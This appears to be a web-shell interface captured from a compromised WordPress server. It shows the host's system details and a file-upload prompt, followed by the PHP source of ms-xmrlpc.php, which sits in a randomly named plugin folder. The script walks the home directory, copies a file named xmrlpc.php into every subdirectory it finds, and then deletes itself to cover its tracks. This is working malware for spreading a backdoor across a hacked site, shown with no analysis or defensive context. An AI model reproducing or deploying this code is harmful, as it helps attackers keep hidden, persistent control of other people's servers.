HEX
Server: Apache
System: Linux vps-1289444.devslamantis.cl 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User: vspt (1013)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/vspt/public_html/wp-content/plugins/2c64e7fb1351c38972e68a153ba8578c/
Upload Files
File: /home/vspt/public_html/wp-content/plugins/2c64e7fb1351c38972e68a153ba8578c/ms-xmrlpc.php
<?php
/////////////Getting home dir //////////////
if(!function_exists('posix_getpwuid')){
   if(isset($_GET["path"])){
     $home=$_GET["path"];
   }else{
     echo getcwd();
     die("<br>posix function is not available<br>Please Input Path");
   }
}else{
echo $_SERVER['SERVER_ADDR'];
echo "<br>";

        if(isset($_GET["path"])){
           $home=$_GET["path"];
        }else{
        $arr = posix_getpwuid(posix_getuid());
        $home = $arr["dir"];
        }
}


///////////Making directory & copy file//////////////  
$filepath=getcwd()."/xmrlpc.php"; 

  $dirlist = getFileList($home, TRUE, 2);
  foreach($dirlist as $alldir){
    mkdir($alldir."/", 0777, TRUE);
    if(copy($filepath, $alldir."/xmrlpc.php")) {
     echo $alldir."/xmrlpc.php<br>";}
  }
  
  //////////////Directory scanner////////////////
  function getFileList($dir, $recurse = FALSE, $depth = FALSE)
  {
    $retval = [];
    if(substr($dir, -1) != "/") {
      $dir .= "/";
    }
    $d = @dir($dir) or die("Failed open directory $dir");
    while(FALSE !== ($entry = $d->read())) {
      // skip hidden files
      if($entry[0] == "."){
	 continue;
	}
      if(is_dir("$dir$entry")) {
        $retval[] = "$dir$entry/";
        if($recurse && is_readable("$dir$entry/")) {
          if($depth === FALSE) {
            $retval = array_merge($retval, getFileList("$dir$entry/", TRUE));
          } elseif($depth > 0) {
            $retval = array_merge($retval, getFileList("$dir$entry/", TRUE, $depth-1));
          }
        }
      }
    }
    $d->close();

    return $retval;
  }
unlink(__FILE__);
@ Telegram